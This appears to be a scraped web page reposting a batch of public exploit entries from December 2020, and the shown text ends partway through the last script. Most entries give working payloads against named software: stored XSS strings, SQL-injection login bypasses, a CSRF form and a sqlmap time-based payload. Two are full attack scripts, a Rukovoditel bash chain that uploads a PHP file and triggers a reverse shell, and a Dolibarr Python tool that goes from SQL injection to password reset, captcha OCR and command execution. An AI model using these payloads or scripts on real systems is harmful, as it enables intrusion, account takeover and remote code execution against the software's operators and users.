All posts published by ISHACK AI BOT
-
PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
# Exploit Title: PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path
# Discovery by: Zaira Alquicira
# Discovery Date: 2020-12-10
# Vendor Homepage: https://pdf-complete.informer.com/3.5/
# Tested Version: 3.5.310.2002
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Steps to discover the Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "pdfsvc" | findstr /i /v """

PDF Complete    PDF Complete    C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService    Auto

# Service info:

C:\Users\TOSHIBA>sc qc "pdfcDispatcher"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: pdfcDispatcher
        TIPO                  : 10  WIN32_OWN_PROCESS
        TIPO_INICIO           : 2   AUTO_START
        CONTROL_ERROR         : 1   NORMAL
        NOMBRE_RUTA_BINARIO   : C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService
        GRUPO_ORDEN_CARGA     :
        ETIQUETA              : 0
        NOMBRE_MOSTRAR        : PDF Document Manager
        DEPENDENCIAS          :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
# Exploit Title: Barcodes generator 1.0 - 'name' Stored Cross Site Scripting
# Date: 10/12/2020
# Exploit Author: Nikhil Kumar
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/barcodes-generator-using-php-mysql-and-jsbarcode-library/
# Version: 1.0
# Tested On: Ubuntu

1. Open the index.php page using the following URL and click on "New Barcode":
   http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php

2. Intercept the request with Burp Suite and put the payload in the "name=" parameter.

Payload :- abc"><script>alert("XSS")</script>

Malicious Request::

POST /Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/php/insert.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Barcodes-Generator-Using-PHP-MySQL-and-JsBarcode/index.php
Upgrade-Insecure-Requests: 1

name=abc"><script>alert("XSS")</script>
-
OpenCart 3.0.3.6 - Cross Site Request Forgery
# Exploit Title: OpenCart 3.0.3.6 - Cross Site Request Forgery
# Date: 12-11-2020
# Exploit Author: Mahendra Purbia {Mah3Sec}
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart CMS - 3.0.3.6
# Tested on: Kali Linux

#Description:
This product has functionality that lets a user add another user's wish-list to his/her cart. User A can add products to his/her wish-list and make the wish-list public, which lets other users see it. As user B there is an "add to cart" button; when you click on it, that public wish-list is added to your cart.

#Additional Information:
Well, I found this vulnerability in OpenCart-based websites but they did not respond, so I installed the latest version of OpenCart CMS, hosted it on localhost with the help of XAMPP and then exploited the vulnerability.

Attack Vector:
1. Create two accounts, A (attacker) and B (victim).
2. Log in as A, add a product to the cart and capture that particular request in Burp Suite.
3. Change the quantity if wanted and then create a CSRF PoC of that request.
4. Save it as .html and send it to the victim. The product is now added to the victim's cart.

#POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">
      <input type="hidden" name="product_id" value="43" />
      <input type="hidden" name="quantity" value="10000000" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
Openfire 4.6.0 - 'path' Stored XSS
# Exploit Title: Openfire 4.6.0 - 'path' Stored XSS
# Date: 20201209
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/nodejs/nodejs.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 60
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=dWiihlZamEAB0mrO; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/nodejs/nodejs.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

path=%22%3E%3CScRiPt%3Eaozunukfyd%3C%2FsCrIpT%3E&update=Save

payload: "><ScRiPt>alert(document.cookie)</ScRiPt>
-
Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
# Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2229
# References:
#   https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
#   https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description:

Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons. Tooltip values can be contributed by plugins, some of which use user-specified values. This results in a stored cross-site scripting (XSS) vulnerability. Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons.

Technical Details and Exploitation:

As can be observed from the patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6

the fix is applied to the tooltip attribute in 'core/src/main/resources/lib/layout/svgIcon.jelly':

<svg class="svg-icon ${attrs.class}" viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}"
     focusable="${attrs.focusable != null ? attrs.focusable : 'false'}"
     aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}"
     style="${attrs.style}" onclick="${attrs.onclick}"
     tooltip="${h.xmlEscape(attrs.tooltip ?: '')}">

svgIcon is a layout element belonging to Jenkins core:
https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon

As stated in the Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/): "Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations don’t result in surprising behavior."

The tooltip attribute can contain HTML code, as described in the forms section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/

For this reason, it is possible to inject XSS code into a Jenkins system by uploading a plugin that contains an <l:svgIcon> element with a malicious XSS payload in the tooltip attribute:

<l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon>

To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ . For information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins

Proof Of Concept:

1. Obtain access to upload Jenkins plugins, or find plugins that can insert an svgIcon element.
2. Generate a plugin. For example, you can create a class that implements the ModelObjectWithContextMenu interface to create a context menu, and implement the method getUrlName() returning a <plugin-url> string that you can navigate to by using the link: http(s)://<jenkins_server>/<plugin-url>
3. In the Jelly file, insert the following element:

<l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon>

This creates an icon that triggers the Cross-Site Scripting when the mouse hovers over it and the tooltip opens. Obviously, CSS and a large width and height can be used to generate an svg element that covers the whole screen, so that the XSS triggers as soon as the user navigates the page.

Solution:

The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
-
Library Management System 2.0 - Auth Bypass SQL Injection
# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
# Date: 2020-12-09
# Exploit Author: Manish Solanki
# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 2.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

#Vulnerable Page: admin page

#Exploit
Open the Application and check the URL: http://localhost/eb_magalona_lms
Open Admin Login
Enter username: a' or 1=1--
Enter password: '
Click on login
The SQL payload gets executed and authorization is bypassed successfully
-
WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
# Exploit Title: WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://sygnoos.com
# Software Link: https://wordpress.org/plugins/popup-builder/ / https://popup-builder.com/
# Version: <= 3.69.6
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox, Microsoft Edge

The Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter Plugin is vulnerable to stored cross site scripting. There are multiple parameters vulnerable to cross site scripting. All versions up to 3.69.6 are vulnerable to stored cross site scripting.

More information about this plugin can be found at the following links:
1. https://wordpress.org/plugins/popup-builder/
2. https://popup-builder.com/

Cross site scripting (XSS) is a common attack vector that injects malicious code into a vulnerable web application. XSS differs from other web attack vectors (e.g., SQL injection) in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk. A successful cross site scripting attack can have devastating consequences for an online business’s reputation and its relationship with its clients. Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

# How to reproduce #

1. Login as Editor or Administrator: https://website.com/wp-login/
2. Go to the following link: https://website.com/wp-admin/edit.php?post_type=popupbuilder or search for PopUp Builder and select or create a new PopUp.
3. Click edit.
4. Search and find: # Custom JS or CSS
5. On the JS -> Opening events section, add two payloads, one for the #2 section and one for the #3 section, like in the following example:

#2 Add the code you want to run before the popup opens. This will be the code that will work in the process of opening the popup. true/false conditions will not work in this phase.

<textarea class="wp-editor-area editor-content" data-attr-event="WillOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-WillOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>

#3 Add the code you want to run after the popup opens. This code will work when the popup is already open on the page.

<textarea class="wp-editor-area editor-content" data-attr-event="DidOpen" placeholder=" #... type your code" mode="text/javascript" name="sgpb-DidOpen">"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script></textarea>

6. Click Update.
7. Go to https://website.com. The XSS alert will pop up.

# All text-areas from the JS section are vulnerable to stored cross site scripting.

Evidence:
1. https://ibb.co/JvBTq0H
2. https://ibb.co/0KP7NFQ
3. https://ibb.co/3cFnVYF
-
Openfire 4.6.0 - 'groupchatJID' Stored XSS
# Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users=

Vulnerable parameters: groupchatJID
payload: "><ScRiPt>alert(document.cookie)</ScRiPt>
-
Openfire 4.6.0 - 'users' Stored XSS
# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E

Vulnerable parameters: users
payload: "><ScRiPt>alert(document.cookie)</ScRiPt>
-
Openfire 4.6.0 - 'sql' Stored XSS
# Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS
# Date: 20201211
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/dbaccess/db-access.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0; csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn; jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E

Vulnerable parameters: sql
payload: "><ScRiPt>alert(document.cookie)</ScRiPt>
-
Medical Center Portal Management System 1.0 - Multiple Stored XSS
# Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1: Log in to the application with any valid user credentials.
Step 2: Click on "Medical Products", select "Add Medical Products", and use "<script>alert(1)</script>" in both the name and description fields. Complete the other fields and save the product.
Step 3: Once you click on save, this should trigger the XSS payload. Clicking on the "Medical Products" page at any time will trigger the stored XSS payload.

Note: The same method applies to the "Add New Hospital | Pharmacy" page.
Step 1: Use "<script>alert("r0b0tG4nG")</script>" as the hospital/pharmacy name, fill in the other required information and click on save. Your payload will be executed any time you click on the "Medical Products" page or the "Add New Hospital | Pharmacy" page.
-
Supply Chain Management System - Auth Bypass SQL Injection
# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

#Exploit
Open the Application and check the URL: http://localhost/scm-master/
Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin
Click on login
The SQL payload gets executed and authentication is bypassed successfully
-
Jenkins 2.235.3 - 'Description' Stored XSS
# Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2230
# References:
#   https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957
#   https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description:

Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission. Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description.

Technical Details and Exploitation:

As can be observed from the patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2

the fix is applied in the activateValidationMessage function of the 'war/src/main/js/add-item.js' javascript file:

function activateValidationMessage(messageId, context, message) {
    ...
    $(messageId, context).html('» ' + message);
    // AFTER FIX: $(messageId, context).text('» ' + message);
    ...
}

The function is called during the creation of a new Item, on the "blur input" event (when the text element of the name input is focused):

$('input[name="name"]', '#createItem').on("blur input", function() {
    if (!isItemNameEmpty()) {
        var itemName = $('input[name="name"]', '#createItem').val();
        $.get("checkJobName", { value: itemName }).done(function(data) {
            var message = parseResponseFromCheckJobName(data);
            if (message !== '') {
                activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE
            } else {
                cleanValidationMessages('.add-item-name');
                showInputHelp('.add-item-name');
                setFieldValidationStatus('name', true);
                if (getFormValidationStatus()) {
                    enableSubmit(true);
                }
            }
        });
    } else {
        ....
        activateValidationMessage('#itemname-required', '.add-item-name');
    }
});

As the "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with the validation rules, an error is triggered. The error message is not escaped in vulnerable versions, so it is vulnerable to XSS.

Validation rules can trigger an error in several ways, for example:
- if the current item name is equal to an already existing item name;
- if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, an error message is shown.

In the first case Jenkins seems to be protected because when a new project is created it is not possible to insert malicious characters (such as <, >). In the second case, the error message also shows a description that can be provided by the user during the regex strategy creation. In the description field it is possible to insert malicious characters, so an XSS payload can be placed in the description field. When a user inserts a name that is not compliant with the project naming strategy, the XSS is triggered.

Proof Of Concept:

1. In <jenkins_url>/configure create a new Project Naming Strategy (enable the checkbox "Restrict project naming") containing the following values:
   Pattern: ^TEST.*
   Description: GX1h4ck <img src=a onerror=alert(1)>
2. Go to the New element creation section (/<jenkins_url>/jenkins/view/all/newJob). When you insert a character in the name field, the alert is triggered.

Solution:

The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
-
Rukovoditel 2.6.1 - RCE (1)
# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819

set -e

function usage () {
    echo "NAME: Rukovoditel v2.6.1, RCE"
    echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
    echo "DESCRIPTION:"
    echo "Upload file test.php on the remote server and trigger the file using a LFI"
    echo "AUTHOR: coiffeur"
    exit
}

if [ "$#" -ne 2 ]; then
    usage
fi

BASE_URL=$1
SID=$2

echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""

echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo "  => \$app_user['id']: $APP_USER_ID"

echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo "  => \$_POST['timestamp']: 1337"

echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1`
echo "  => \$verifyToken: $VERIFY_TOKEN"
echo ""

echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F '[email protected]'
echo ""

echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`" +%s)
echo "  => timestamp: $TIME"

echo "[*] Trying to recover the generated filename:"
FILENAME=`echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo "  => filename: $FILENAME"

echo "[*] Trying to reconstruct full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo "  => full path: $FULL_PATH"
echo ""

echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""

echo "[*] Trying to update language settings ... (Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"

echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID"

echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"

echo "> Done"
-
Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into the application with credentials
Step 2. Click on Branch
Step 3. Select New Branch: http://127.0.0.1/index.php?page=new_branch
Step 4. Fill in the form and click on save
Step 5. Capture the request to the "/ajax.php?action=save_branch" page in Burp Suite
Step 6. Save the request and run sqlmap on the request file using the command "sqlmap -r request --time-sec=5 --dbs"
Step 7. This will inject successfully and you will have information disclosure of all database contents

---
Parameter: MULTIPART street ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"


-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"

11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"

111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"

1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"

11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"

1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"

111111111
-----------------------------12317926718649295872939507245--
---
-
Dolibarr 12.0.3 - SQLi to RCE
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3

import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]


def usage():
    banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD>
EXAMPLE: python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
    print(banner)
    exit(-1)


def hex(text):
    return "0x" + binascii.hexlify(text.encode()).decode()


def hash(password):
    salt = bcrypt.gensalt()
    hashed = bcrypt.hashpw(password.encode(), salt)
    return hashed.decode()


def authenticate(url, username, password):
    datas = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password
    }
    r = SESSION.post(f"{url}index.php", data=datas, allow_redirects=False, verify=False)
    if r.status_code != 302:
        if DEBUG:
            print(f"[x] Authentication failed!")
        return 0
    if DEBUG:
        print(f"  [*] Authenticated as: {username}")
    return 1


def get_antispam_code(base_url):
    code = ""
    while len(code) != 5:
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        temp_image = f"/tmp/{random.randint(0000,9999)}"
        with open(temp_image, "wb") as f:
            f.write(r.content)
        with open(temp_image, "rb") as f:
            code = pytesseract.image_to_string(
                Image.open(BytesIO(f.read()))).split("\n")[0]
        for char in code:
            if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
                code = ""
                break
    return code


def reset_password(url, login):
    for _ in range(5):
        code = get_antispam_code(url)
        headers = {
            "Referer": f"{url}user/passwordforgotten.php"
        }
        datas = {
            "action": "buildnewpassword",
            "username": login,
            "code": code
        }
        r = SESSION.post(url=f"{url}user/passwordforgotten.php", data=datas, headers=headers, verify=False)
        if r.status_code == 200:
            for response in [f"Request to change password for {login} sent to",
                             f"Demande de changement de mot de passe pour {login} envoyée"]:
                if r.text.find(response):
                    if DEBUG:
                        print(f"  [*] Password reset using code: {code}")
                    return 1
    return 0


def change_password(url, login, pass_temp):
    r = requests.get(url=f"{url}user/passwordforgotten.php?action=validatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
                     allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f"  [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters
    }
    r = SESSION.post(url=f"{url}admin/security_file.php", data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["Record modified successfully", "Enregistrement modifié avec succès"]:
            if response in r.text:
                if DEBUG:
                    print(f"  [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    headers = {
        "Referer": f"{url}admin/security_file.php"
    }
    files = {
        "userfile[]": open("junk.txt", "rb"),
    }
    datas = {
        "sendit": "Upload"
    }
    if DEBUG:
        print(f"  [*] Triggering reverse shell")
    r = SESSION.post(url=f"{url}admin/security_file.php", files=files, data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ["File(s) uploaded successfully",
                         "The antivirus program was not able to validate the file (file might be infected by a virus)",
                         "Fichier(s) téléversés(s) avec succès",
                         "L'antivirus n'a pas pu valider ce fichier (il est probablement infecté par un virus) !"]:
            if response in r.text:
                if DEBUG:
                    print(f"  [*] Exploit done")
                return 1
    return 0


def get_version(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
    if x:
        version = x[0]
        if "12.0.3" in version:
            if DEBUG:
                print(f"  [*] {version} (exploit should work)")
            return 1
    if DEBUG:
        print(f"[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    r = SESSION.get(f"{url}index.php", verify=False)
    x = re.findall(r"id=\d", r.text)
    if x:
        id = x[0]
        if DEBUG:
            print(f"  [*] id found: {id}")
        r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
        soup = BeautifulSoup(r.text, 'html.parser')
        for img in soup.find_all("img"):
            if img.get("title") in ["Actif", "Active"]:
                for td in img.parent.parent.find_all("td"):
                    privileges = ["Consulter les commandes clients", "Read customers orders"]
